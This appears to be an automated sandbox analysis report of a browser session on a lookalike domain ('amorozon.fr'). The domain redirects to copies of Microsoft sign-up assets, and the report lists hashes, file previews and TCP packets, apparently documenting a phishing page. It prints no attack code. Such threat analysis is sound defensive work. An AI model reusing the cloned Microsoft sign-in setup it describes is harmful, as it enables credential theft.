SHA1:	DDA2CB89A241BC424746D8CF2A22A35535094611
SHA-256:	6075736EA9C281D69C4A3D78FF97BB61B9416A5809919BABE5A0C5596F99AAEA
SHA-512:	B9135D934B9EA50B51BB0316E383B114C8F24DFE75FEF11DCBD1C96170EA59202F6BAFE11AAF534CC2F4ED334A8EA4DBE96AF2504130896D6203BFD2DA69138F
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
IE Cache URL:	https://signup.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\oneds_Xr2D7Nex80v7A-8bxF8jgQ2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	82052
Entropy (8bit):	5.312628857785992
Encrypted:	false
SSDEEP:	768:paVnZVNvlcxbEFWEI3+d8lLCNMnSpjaQ2Z8q2G/b8bSqY4gs8Lh1mAXbQON9fAvC:cuediuNMk1T/qTlAvrQUAluA
MD5:	5EBD83ECD7B1F34BFB03EF1BC45F2381
SHA1:	CD1E0062A04B11EEB36586766BF5144955250E65
SHA-256:	4C57821AA26F21DEEBC39E3C750BC4FE246C430E5E50F4ADD0CFF53943C8C608
SHA-512:	9B56B2F1F301AD65D03514E1EC557830501805CBB81A891A518601898AE4F3C8A4C063D64036C2E8F1E539E5989CB608D535A01552BCADF008B53D1B699E9E88
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/oneds_Xr2D7Nex80v7A-8bxF8jgQ2.js?v=1
Preview:	/!.. 1DS JS SDK Core, 2.3.4.. * Copyright (c) Microsoft and contributors. All rights reserved... * (Microsoft Internal Only).. */..!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n(e.oneDS=e.oneDS\|\|{})}(this,function(c){"use strict";var i="function",o="object",n="undefined",a="prototype",s="hasOwnProperty";function e(){return typeof globalThis!==n&&globalThis?globalThis:typeof self!==n&&self?self:typeof window!==n&&window?window:typeof global!==n&&global?global:null}function r(e){var n=Object.create;if(n)return n(e);if(null==e)return{};var t=typeof e;if(t!==o&&t!==i)throw new TypeError("Object prototype may only be an Object:"+e);function r(){}return r[a]=e,new r}function t(e){for(var n,t=1,r=arguments.length;t<r;t++)for(var i in n=arguments[t])Object[a][s].call(n,i)&&(e[i]=n[i]);return e}var u=function(e,n){return(u=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(e,n){e.__prot

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\shell.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	82190
Entropy (8bit):	5.036904170769404
Encrypted:	false
SSDEEP:	1536:tJzwN0CbUTqI34/9w6/Qua+1IGEbjBko230WBYT:vyA
MD5:	1F9995AB937AC429A73364B4390FF6E8
SHA1:	81998DCC6407CEB5CEF236AD52B9F2A3A9528D3B
SHA-256:	49E5166F40D8586714F86E08AB76A977199DF979357147A0E81980A804151C2A
SHA-512:	6669AE352FF46DB734BB8F973D1C0527C3A5EC4119D534AAE4C33F29EFF970168ED5FE200A05D4E1B6A2EC0E090E2207549B926317D489DC7664B0D9C2085465
Malicious:	false
Reputation:	low
IE Cache URL:	https://assets.onestore.ms/cdnfiles/onestorerolling-1510-19009/shell/v3/scss/shell.min.css
Preview:	@charset "UTF-8";@font-face{font-family:'wf_segoe-ui_normal';src:local("Segoe UI");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");font-weight:normal;font-style:normal}@font-face{font-family:'wf_segoe-ui_semilight';src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.eot");src:url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.eot?#iefix") format("embedded-opentype"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.woff") format("woff"),url("//i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.ttf")

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\908da3c8f209ef75ffb734f6652bf849[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.321370551001742
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPP3gHAnmjT0+KqD:J0+ox0RJWWPPI/bT
MD5:	99B4ADACF4D2463DAF895CD8668EAA7E
SHA1:	CE4D8B7CDB51EACD424CE2D6C79B678923D9FD1E
SHA-256:	46F6E409016BA347A476F4F46F9CA382C52E22ACA12A296111E1D5236DA633E9
SHA-512:	1C706870648FCB95020115AFFA4BF309B1769EB9F7651D3DB5EFB724AE3B8ECBD11D8A129761EC064A1FBCB9F4FC102F3A6453C2D3B8048266779CDB0865D59B
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\converged_ux_v2_RfnRCrmapm3W_OFn994CMA2[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	95459
Entropy (8bit):	5.292153801820765
Encrypted:	false
SSDEEP:	1536:QpHDIqBBw+T6azA/PWrF7qvEAFiQcpmKboBdiyMUWC8ErpH/TVTDrwCGNJZ3yU0P:IBFNyUM
MD5:	45F9D10AB99AA66DD6FCE167F7DE0230
SHA1:	D443993E7ADB3108167BCD94E5D3126A2E3EE7EE
SHA-256:	D72952FC8950D26C08C6BAD73D389C35D0EAF164CB73503183A2966DEFAAD991
SHA-512:	0DBCCCB37A3A249C7DBB948AC756FD332298DD8A742E92DF6A767FD565C925768058C05AF182106F8DA29979C0D23BD3E9ECE9E41C1EA931F4F198CBDCE8BF3F
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/converged_ux_v2_RfnRCrmapm3W_OFn994CMA2.css?v=1
Preview:	/! Copyright (C) Microsoft Corporation. All rights reserved. //*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. ..//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.microsoft.com/favicon.ico?v2
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\icons[1].eot Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Embedded OpenType (EOT), icons family
Category:	downloaded
Size (bytes):	4388
Entropy (8bit):	5.568378803379191
Encrypted:	false
SSDEEP:	96:2WZx42qACoApC6do8MPOGiN4mER38GTDfO/fv:1x42qAHAo6VMPi6mcTy
MD5:	77E1987DF3A0274C5A51E3C55CEE7C98
SHA1:	9B0FE96AF141AB09183F386F65BC627B8C396460
SHA-256:	EF04649D4D068673CF0FA47EF4C45C8BE291E703F4EC5FC0E507F17839120AA2
SHA-512:	B1E0CFB515FF2298799BA54574899D27B1FC043F66CC4E9591C504F88273B98697B99ED25955DB84986B39ED9F51864611833DC88064B14C29ADC020FBF6E295
Malicious:	false
Reputation:	low
IE Cache URL:	https://assets.onestore.ms/cdnfiles/external/oneui/oneui1.16.2/dist/fonts/icons/icons.eot?
Preview:	$.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/2@.Mn...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............\|.......\|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	84245
Entropy (8bit):	5.369495907619158
Encrypted:	false
SSDEEP:	1536:kPEkjP+iADIOr/NEe876nmBu3HvF38Nd+uJO1z6/A4TqAub0i4ULvguEhjzXpa98:7NMnJiz6oAQKP5a98Hrh
MD5:	E40EC2161FE7993196F23C8A07346306
SHA1:	AFB90752E0A90C24B7F724FACA86C5F3D15D1178
SHA-256:	874706B2B1311A0719B5267F7D1CF803057E367E94AE1FF7BF78C5450D30F5D4
SHA-512:	5F57CC757FFF0E9990A72E78F6373F0A24BCE2EDF3C4559F0B6FEF3CF65EDF932C0F3ECA5A35511EA11EABC0A412F1C7563282EC76F6FA005CC59504417159EB
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	80144
Entropy (8bit):	5.421376219099593
Encrypted:	false
SSDEEP:	1536:vZ2N4/PzS0zdqm4NVmVtfB6aTJDIO5XxV7FyTDQIp8a+fNNnbt:Ay+0LmmBt7c1+Rfbt
MD5:	5F50584B68D931B8BB85F523F15BAA14
SHA1:	FAF4BD348F40016BCE0ABF54F167C7923B303ABB
SHA-256:	3C829DCF48768082A6177B77AE4E499337ED4C8BD056705CDB1E979F7B6EFCE5
SHA-512:	EB01573B9152D93400C7BCDC0C3746B58E8F5F8BA7A4C033D3A30D688E307543979402CAD4A19249391BA3113466F562D20A521BBEFFB7864AEBEB18FDB79BC1
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1
Preview:	/!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------....This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .... Knockout JavaScript library v3.3.0.. * (c) Steven Sanderson - http://knockoutjs.com/.. * License: MIT (http://www.opensource.org/licenses/mit-license.php)....Provided for Informational Purposes Only....MIT License ....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\lightweightsignuppackage_oZIcfFtGMdm_yHyDEji_8w2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	186732
Entropy (8bit):	5.388313213050356
Encrypted:	false
SSDEEP:	3072:6Krp15hD/TgaVS2Xu5Ly4yIH2ala93wfZKISXSgq4rF90Et4:Z1wdy4yIH2ala93wfZZKZ4
MD5:	A1921C7C5B4631D9BFC87C831238BFF3
SHA1:	EDC924AF3FB85C030002885B8477FAE5BA76480C
SHA-256:	8BE695914CB1309017E5CBFEC706ABA98EFEA6E0EE9E65CC43F124CCABD5960A
SHA-512:	2047DEB4709E05B70BDF866285138ECFA4B7C9FE161670BC6C2DA59E44F894270B60F807E8D47F5E7988BE03B22C77E378061BE2805D075D818B17702AE8513A
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/lightweightsignuppackage_oZIcfFtGMdm_yHyDEji_8w2.js?v=1
Preview:	function Encrypt(e,t,n,a){var i=[];switch(n.toLowerCase()){case"chgsqsa":if(null==e\|\|null==t){return null}i=PackageSAData(e,t);break;case"chgpwd":if(null==e\|\|null==a){return null}i=PackageNewAndOldPwd(e,a);break;case"pwd":if(null==e){return null}i=PackagePwdOnly(e);break;case"pin":if(null==e){return null}i=PackagePinOnly(e);break;case"proof":if(null==e&&null==t){return null}i=PackageLoginIntData(null!=e?e:t);break;case"saproof":if(null==t){return null}i=PackageSADataForProof(t);break;case"newpwd":if(null==a){return null.}i=PackageNewPwdOnly(a)}if(null==i\|\|"undefined"==typeof i){return i}if("undefined"!=typeof Key&&void 0!==parseRSAKeyFromString){var r=parseRSAKeyFromString(Key)}var o=RSAEncrypt(i,r,randomNum);return o}function PackageSAData(e,t){var n=[],a=0;n[a++]=1,n[a++]=1,n[a++]=0;var i,r=t.length;for(n[a++]=2*r,i=0;r>i;i++){n[a++]=255&t.charCodeAt(i),n[a++]=(65280&t.charCodeAt(i))>>8}var o=e.length;for(n[a++]=o,i=0;o>i;i++){n[a++]=127&e.charCodeAt(i)}return n}function PackagePwdOn

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	26214
Entropy (8bit):	5.070912570595838
Encrypted:	false
SSDEEP:	384:Z3EReHg2sQhdCdfqPxZebPrmuex3dmac3zirs7rOubUrUA/4RkD:lQAg2sQ8q2bPrmjx3dmac3ziarbnA1
MD5:	A55B5A84A4BD59421974DAA0D430E11E
SHA1:	09926A2D8BBFA41C3085BCF8A546AEAD3FB8C0FC
SHA-256:	FC6D389E166EBA3F121C4A92F446C1C36997D770862F4D6994192CE1AD4A1051
SHA-512:	80E302F28ABB96953E84EABB9D56106D8AA3C410A54A3185588BAA9709CDBF33752D263447814A55AEBE5E7E0BB14396B02732111906792059FE6D9A5F626AF5
Malicious:	false
Reputation:	low
IE Cache URL:	https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1
Preview:	!function(){registerNamespace("$Config"),$Config.sharedStrings={"errors":{"required":"This information is required.","emailRequired":"An email address is required","phoneRequired":"A phone number is required","passwordRequired":"A password is required","invalidEmailFormat":"Enter the email address in the format someone@example.com.","invalidPhoneFormat":"The phone number you entered isn't valid. Your phone number can contain numbers, spaces, and these special characters: ( ) [ ] . - * /","emailMustStartWithLetter":"Your email address needs to start with a letter. Please try again.","memberNameAvailable":"{0} is available.","memberNameAvailableEasi":"After you sign up, we'll send you a message with a link to verify this user name.","memberNameExistsPhone":"If you own a Microsoft account with this number, go back and sign in.","proofAlreadyExistsError":"This is already part of your security info.","signupBlocked":"{0} isn't available.","memberNameTakenPhone":"The phone number you typed i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\print-icon[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	173
Entropy (8bit):	5.970149697517944
Encrypted:	false
SSDEEP:	3:yionv//thPl9vtt+NTl0qRthwkBDsTBZtqmA73Fs+rQx33npdtnoypZh9Dicl2up:6v/lhPmNp0WnDspBAzqPnpdiyTh9Fp
MD5:	023F5AC6E0114AF1F781BE5D3C956385
SHA1:	C166284B8541F1DE32DC5C4DEC635C296BF85C98
SHA-256:	75D637BF6B6DFF2525095D0BE7E0C90F012BB118C2EF19099AFDCBC630ADFC79
SHA-512:	DAFA49056E3D3014DB392410685CC05773C09938E2E700657727928EDCFF8EA2D7C769D377539C52DA70321B94F4E8F045F565EC51BC2B701D95BB3213CC2203
Malicious:	false
Reputation:	low
IE Cache URL:	https://c.s-microsoft.com/en-us/CMSImages/print-icon.png?version=60ebb5de-511c-db20-3795-563c739c5e12
Preview:	.PNG........IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx.b...?..0222`..jX..a5...D0.50.......k......:...X=....'..(..I.....K........ .........IEND.B`.

C:\Users\user\AppData\Local\Temp\~DF4D88143B5EF30894.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.3144567018163327
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laANIwC53O:kBqoxxJhHWSVSEabWwCNO
MD5:	41C9DEE29EF2A6D5CB981EBAC569B9F8
SHA1:	FF966DCF44D8CAE99A5D48506C500201CA08AA5A
SHA-256:	D493C6D9E38384455AB1BFB626BC07AF31DAB9B061751E6E04C7FFD8D05B7979
SHA-512:	F3D5E157883D0C10BA2887544ACC3F2081985DCCF58625B0FBFABC66ACBB00FA54C2D7E8C4C22A394B79EA49988AE71BD6DA7D7B25125ADFF581FABEBE9A2915
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF61A1327D3F69D777.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13029
Entropy (8bit):	0.47744186780168796
Encrypted:	false
SSDEEP:	96:kBqoIHmdHmbHmzmhmTmsmhm4mim4msmcsmc3:kBqoIGdGbGqYK3Y7V73c3c3
MD5:	11E4EE501E8BC6AAB721153235529266
SHA1:	5AC7C5B34FD339BC05CE99194DA5C0863CAC4A59
SHA-256:	504F3EA7B7396BAF5E08004D4B5261DD89FF4E506F40E8076D6B89C3BEFB7EB8
SHA-512:	566B6C68665D921F299BD2D3E219A7A174D1166D9785D69BE058CAF805DF8D3FCF5F9F2B7C69006222F9D80D367D099051ACFFE193EAD82372ADA064B542146C
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7977F7404D051671.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	87236
Entropy (8bit):	2.070698085768341
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+gCgkgugHg0g7ijiLi/0iziUiiiXvuDvwRiSvuDvCvuDvPHvuDv2vg:jv4sv4Cv4Pv42v4sv49v4+v4bv4
MD5:	3F27201CFEF77CEEF91A705F7D37F886
SHA1:	887711FB7B34DD6825912CC6706D38773881D9DE
SHA-256:	9D15191984C76C6FCE9443769EFAF64220AF9690A7BEFB814EA7160CC92FEC67
SHA-512:	C52ADA29FCCD2A057C4D87B793618BCBA3F1DE28F0A08CCFE447C683CFD226D2968D21578D37C832097992DF91F48358B7F8B7D0022D65CE46A90CA110B46949
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 18:44:31.304482937 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.304645061 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.427988052 CET	443	49723	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.428081036 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:31.428404093 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.428440094 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.442528963 CET	49723	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:31.442841053 CET	49724	443	192.168.2.4	170.10.160.34
